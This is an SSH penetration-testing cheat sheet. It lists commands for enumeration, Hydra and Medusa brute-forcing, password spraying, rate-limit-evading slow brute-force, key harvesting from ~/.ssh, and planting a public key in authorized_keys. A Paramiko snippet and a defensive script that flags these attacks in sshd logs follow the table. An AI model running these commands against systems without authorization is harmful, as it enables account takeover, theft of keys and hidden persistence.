SSH Pentesting

The document outlines various commands and tools for SSH pentesting, including enumeration, brute-forcing, password spraying, and exploiting known vulnerabilities. It also covers techniques for post-exploitation, traffic analysis, and custom exploits using Python's Paramiko library. Additionally, it mentions advanced tools like Metasploit and Pwncat for automated scanning and session management.

Uploaded by Andrés Ramírez

SSH Pentesting

| Category | Command/Tool | Description |
|---|---|---|
| Enumerating SSH Configuration | `nmap -p 22 --script ssh2-enum-algos <target-ip>` | Check SSH algorithms and encryption methods. |
| | `nmap -sV -p 22 --script ssh-hostkey <target-ip>` | Discover SSH version and host key. |
| Brute-Forcing SSH Credentials | `hydra -l <username> -P <password_list> ssh://<target-ip>` | Brute-force SSH passwords with Hydra. |
| | `medusa -h <target-ip> -u <username> -P <password_list> -M ssh` | Brute-force SSH passwords with Medusa. |
| Password Spraying | `hydra -L <user_list> -p <common_password> ssh://<target-ip>` | Test a common password across multiple usernames. |
| SSH Key-Based Authentication | `ssh -i <private_key> <username>@<target-ip>` | Attempt login with a private key. |
| Weak SSH Configuration Testing | `ssh-audit <target-ip>` | Identify weak SSH configurations. |
| Banner Grabbing | `nc <target-ip> 22` | Retrieve SSH banner details. |
| Testing Misconfigurations | Check for default credentials, hardcoded passwords, or use rockyou.txt for password lists. | Test weak or default configurations. |
| Exploiting Known Vulnerabilities | `searchsploit openssh <version>` | Search for exploits matching the SSH version. |
| Port Forwarding and Tunneling | `ssh -L <local-port>:<remote-host>:<remote-port> <username>@<target-ip>` | Local port forwarding for SSH tunneling. |
| | `ssh -R <remote-port>:<local-host>:<local-port> <username>@<target-ip>` | Remote port forwarding for reverse tunneling. |
| Post-Exploitation | `sudo -l` | Check for privilege escalation opportunities. |
| | Check `~/.ssh/` for keys and other sensitive data. | Locate private SSH keys. |
| MITM and Traffic Analysis | Use tools like mitmproxy to intercept SSH traffic (if SSL/TLS downgrade is possible). | Analyze SSH traffic in a controlled environment. |
| Bypassing IP Whitelisting | `ssh -J <user1>@<jump_host> <user2>@<target-host>` | Chain multiple SSH hops using ProxyJump. |
| Passwordless Login Testing | `echo "<your_public_key>" >> ~/.ssh/authorized_keys` | Add your public key to the target's authorized keys. |
| Time-Based Attack | Measure response times for authentication errors using SSH commands. | Detect patterns in timing to infer valid accounts. |
| Slow Brute-Force | `hydra -l <username> -P <password_list> -t 1 -w 5 ssh://<target-ip>` | Slow brute-forcing to bypass rate-limiting. |
| Custom Exploits | Write custom scripts with Python's Paramiko library (see the snippet below). | Run automated commands via SSH. |
| Advanced Tools | Metasploit | Use auxiliary/scanner/ssh modules for automated scanning and exploitation. |
| | Pwncat | Manage post-exploitation SSH sessions with an interactive tool. |

Paramiko snippet referenced in the Custom Exploits row:

```python
import paramiko

client = paramiko.SSHClient()
# AutoAddPolicy accepts any unknown host key, so this skips host key verification.
client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
client.connect('<target-ip>', username='<username>', password='<password>')
# Run a single command and read its output from the stdout channel.
stdin, stdout, stderr = client.exec_command('ls -la')
print(stdout.read().decode())
client.close()
```

@sukshield.com
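The brute-forcing, password-spraying and slow brute-force rows above all leave a distinctive trace in sshd's auth log. As an added example (not part of the original cheat sheet), this Python script parses constructed sshd log lines and tags each source address by the pattern it matches; the thresholds and the assumed log year are assumptions to be tuned per environment.

```python
import re
from collections import defaultdict
from datetime import datetime
# Constructed sshd syslog lines (not from a real host): one spraying source,
# one slow single-user guesser that finally succeeds, one benign typo.
SAMPLE_LOG = """\
Mar  3 10:00:01 host sshd[1201]: Failed password for invalid user admin from 203.0.113.5 port 41022 ssh2
Mar  3 10:00:07 host sshd[1202]: Failed password for root from 203.0.113.5 port 41023 ssh2
Mar  3 10:00:13 host sshd[1203]: Failed password for invalid user test from 203.0.113.5 port 41024 ssh2
Mar  3 10:05:00 host sshd[1300]: Failed password for alice from 198.51.100.9 port 50001 ssh2
Mar  3 10:10:00 host sshd[1301]: Failed password for alice from 198.51.100.9 port 50002 ssh2
Mar  3 10:15:00 host sshd[1302]: Failed password for alice from 198.51.100.9 port 50003 ssh2
Mar  3 10:16:00 host sshd[1303]: Accepted password for alice from 198.51.100.9 port 50004 ssh2
Mar  3 10:30:00 host sshd[1400]: Failed password for bob from 192.0.2.20 port 60001 ssh2
"""
# Matches the "Failed/Accepted password" lines OpenSSH writes to the auth log.
LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) password for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<ip>\S+) port \d+ ssh2$"
)

def parse(log_text, year=2024):
    """(timestamp, result, user, ip) per matching line; syslog omits the year, so assume one."""
    return [
        (datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S"), m["result"], m["user"], m["ip"])
        for m in map(LINE_RE.match, log_text.splitlines()) if m
    ]

def tag_source(evs, spray_users=3, fail_threshold=3, slow_gap_s=120):
    """Tags for one source IP's events (chronological). Thresholds are assumptions; tune them."""
    fails = [e for e in evs if e[1] == "Failed"]
    tags = []
    if len({e[2] for e in fails}) >= spray_users:
        tags.append("password-spray")  # one password tried against many users
    elif len(fails) >= fail_threshold:  # hydra -t 1 -w 5 style guessing leaves long gaps
        gaps = [(b[0] - a[0]).total_seconds() for a, b in zip(fails, fails[1:])]
        tags.append("slow-brute-force" if min(gaps, default=0) >= slow_gap_s else "brute-force")
    if tags and any(e[1] == "Accepted" for e in evs):
        tags.append("success-after-failures")  # a guessed credential likely worked
    return tags

def classify(events):
    """Group events by source IP and keep only sources that match an attack pattern."""
    by_ip = defaultdict(list)
    for ev in events:
        by_ip[ev[3]].append(ev)
    found = {ip: tag_source(evs) for ip, evs in by_ip.items()}
    return {ip: tags for ip, tags in found.items() if tags}
```

Run `classify(parse(SAMPLE_LOG))` to see the spraying source and the slow guesser flagged while the single failed login from 192.0.2.20 is ignored.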
